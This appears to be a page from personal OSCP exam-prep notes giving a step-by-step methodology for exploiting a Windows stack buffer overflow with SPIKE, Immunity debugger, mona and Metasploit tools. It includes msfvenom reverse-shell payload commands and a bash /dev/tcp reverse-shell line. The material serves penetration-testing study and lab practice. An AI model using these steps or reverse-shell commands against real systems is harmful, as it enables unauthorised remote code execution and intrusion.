methodology

NOTE: for OSCP prep, you can skip the METHOD_1: SPIKING section

Run Immunity debugger as administrator
Attach the vulnerable service to Immunity debugger
Configure Mona working folder using !mona config -set workingfolder c:\kashz

METHOD 1: Spiking (finding the crash)

NOTE: there could be multiple buffers in the vulnerable service, we need to confirm which buffer is vulnerable.

./generic_send_tcp IP PORT SPIKE_SCRIPT SKIPVAR SKIPSTR
- use SKIPVAR=0 SKIPSTR=0 to fuzz from beginning.

file: spike_script_example.spk

s_readline();
s_string("to-send-something? ");
s_string_variable("0");

METHOD 2: Spiking (finding the crash)

NOTE: you can modify the fuzzer.py to send a specific number of bytes and confirm crash.

Run fuzzer.py and note the crash byte number

Finding OFFSET and EIP

Generate pattern 400 bytes more than crash using msf: msf-pattern_create -l <number>
set PAYLOAD = <generated-alue>
Run exploit.py and find offset
1. Using mona: !mona findmsp -distance <EIP>. Should show in log windows as EIP contains normal pattern : 0x6f43396e (offset 1978)
2. [OR] using msf: msf-pattern_offset -l <number> -q <EIP>
set OFFSET = value, set PAYLOAD = "", set RETURN = iiii value of 0x69696969.
Run exploit.py
Program (should) crash with EIP = 69696969

Finding BadChars using !mona

Generate byte-array using mona excluding the \x00 null byte using !mona bytearray -cpb "\x00"
set PAYLOAD = ( generated-byte-array )
Run exploit.py
Note ESP and find barChar using !mona compare -f C:\kashz\bytearray.bin -a <ESP_address>
Remove 1st badChar from mona byte-array and generate new !mona bytearray -cpb "\x00\xXX"
Remove the badChar from PAYLOAD in exploit.py
Continue steps 3-6 until mona memory corruption log output says STATUS = UNMODIFIED

Finding JMP using !mona

Note: ALL badChars are needed to find the JMP instruction.

Locate all JMP ESP using !mona jmp -r esp -cpb "\x00\xXX"
Select the one, for which ASLR and other security protections are FALSE.
Windows requires little endian style. So,
1. if JMP instruction is 0x12345678.
2. Take 2 letter from right-to-left and form return address
3. return address is \x78\x56\x34\x12
4. set RETN = \x78\x56\x34\x12 in exploit.py

Generate msfvenom Payload

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "badChars" -f c
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "badChars" -f c

# windows under linux (wine)
bash -i >& /dev/tcp/IP/PORT 0>&1

set PAYLOAD = ( payload )

Prepend NOPs (\x90)

NOTE: try 32 if 16 does not work.

Usually an encoder will be used to generate the msfvenom payload which requires memory space to unpack. set PADDING = "\x90" * 16 in exploit.py

Manual Process

Finding BadChars manually

If by any chance, mona is adding new badChars after every removal of possible badChar, time to do it manually. Follow the same process but instead of mona to check for badChar use the following method.

(top-menu option) View > CPU window > (top right register pane) right-click ESP > follow dump
(bottom left hexdump pane) same CPU windows - see all bad chars in line
read thoroughly and check if all byte-array-chars are in order.
1. If any char is skipped or missing - it is a badChar
2. If byte-array-chars are missing after a specific char - that is a badChar
3. Remove one char at a time until you reach the last \0xff.

Finding JMP manually

Note: ALL badChars are needed to find the JMP instruction.

view > CPU window
(top left pane) right click > Search for > All Commands in all modules > JMP ESP > search
Choose JMP Address with Green color and module name (as the file running)
Follow the above process to create little endian style return address

[OR]

use !mona modules.
1. Find a module that is being loaded with protection settings as False.
2. use !mona find -s "\xff\xe4" -m MODULE_NAME
  1. JMP ESP == FFE4 (in assembly)

Previousfuzzer.py Nextcrackmapexec

Last updated 3 years ago